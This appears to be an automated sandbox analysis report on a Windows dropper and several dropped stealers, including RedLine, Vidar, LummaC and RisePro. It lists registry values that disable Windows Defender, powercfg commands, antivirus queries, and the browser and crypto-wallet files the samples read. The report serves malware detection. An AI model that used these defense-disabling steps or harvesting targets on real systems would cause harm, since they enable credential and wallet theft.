Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ydYqwUL3GNS6IHkMgIteny78.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\ZzpT5hwyVjlAXfLjB1r1iwOX.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\ifM1E2HUtOYe96efnF4a_sDH.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\lockfile VolumeInformation

Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe

Code function: 7_2_004DC84D GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

7_2_004DC84D

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions	Registry value created: Exclusions_Extensions 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableAntiSpyware 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender	Registry value created: DisableRoutinelyTakingAction 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableBehaviorMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableOnAccessProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableScanOnRealtimeEnable 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1	Jump to behavior
Source: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\group policy objects\{B9FEE511-3092-40D0-A7E3-1981640294CA}Machine\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRawWriteNotification 1	Jump to behavior

Exclude list of file types from scheduled, custom, and real-time scanning

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

Registry value created: Exclusions_Extensions 1

Jump to behavior

Modifies Group Policy settings

Source: C:\Users\user\Desktop\WlCIinu0yp.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\SimpleAdobe\0aUjr05rR32eKJo8dvN8X8hr.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

AV process strings found (often used to terminate AV products)

Source: RegAsm.exe, 00000017.00000002.3132751366.0000000000DFA000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\WlCIinu0yp.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected PureLog Stealer

Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.pRIMqfuwRZ49ldgjUZ_z2py6.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2417687969.0000000004648000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.1909434761.0000000000C62000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Documents\SimpleAdobe\pRIMqfuwRZ49ldgjUZ_z2py6.exe, type: DROPPED

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.2f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.wDFs1SzoVQiT2__nQmbIm6Rg.exe.317000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.1955136682.0000000000315000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: wDFs1SzoVQiT2__nQmbIm6Rg.exe PID: 7800, type: MEMORYSTR

Yara detected RisePro Stealer

Source: Yara match	File source: 16.2.H14SDf_AWcPvvQK5Xx97sISX.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.hvkESMr10WtP7_E6btIJmDx0.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rYuCm9r3mZzk_0VrthAnPu8c.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2552343455.0000000005E54000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2542152281.0000000005F92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2416770410.0000000005F68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2416630360.0000000005F11000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.2418840174.0000000005FFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: hvkESMr10WtP7_E6btIJmDx0.exe PID: 7700, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ZzpT5hwyVjlAXfLjB1r1iwOX.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rYuCm9r3mZzk_0VrthAnPu8c.exe PID: 7824, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Jl9_JMpull8yLuWoc7AXV8O.zip, type: DROPPED

Yara detected Socks5Systemz

Source: Yara match	File source: 00000031.00000002.3127540718.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000031.00000002.3128895190.0000000000A71000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: softjenimmp3converter.exe PID: 3992, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e2b000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.9RJ0JeM9uj2rfsuq_woBmmIY.exe.e00000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.1951214705.0000000000E29000.00000004.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3121845008.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.3132751366.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9RJ0JeM9uj2rfsuq_woBmmIY.exe PID: 7816, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 8000, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.pRIMqfuwRZ49ldgjUZ_z2py6.exe.46a3010.2.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Electrum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Binance\app-store.json
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: pRIMqfuwRZ49ldgjUZ_z2py6.exe, 00000008.00000000.1909434761.0000000000F93000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: ~PColumnMasterKey_KeyStoreProviderNameNameP~PColumnMasterKey_KeyStoreProviderNameDescp~FSecurityPredicate_PredicateTypeDesc
Source: rYuCm9r3mZzk_0VrthAnPu8c.exe, 00000016.00000003.2416303909.0000000005FE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\hvkESMr10WtP7_E6btIJmDx0.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\Documents\SimpleAdobe\rYuCm9r3mZzk_0VrthAnPu8c.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
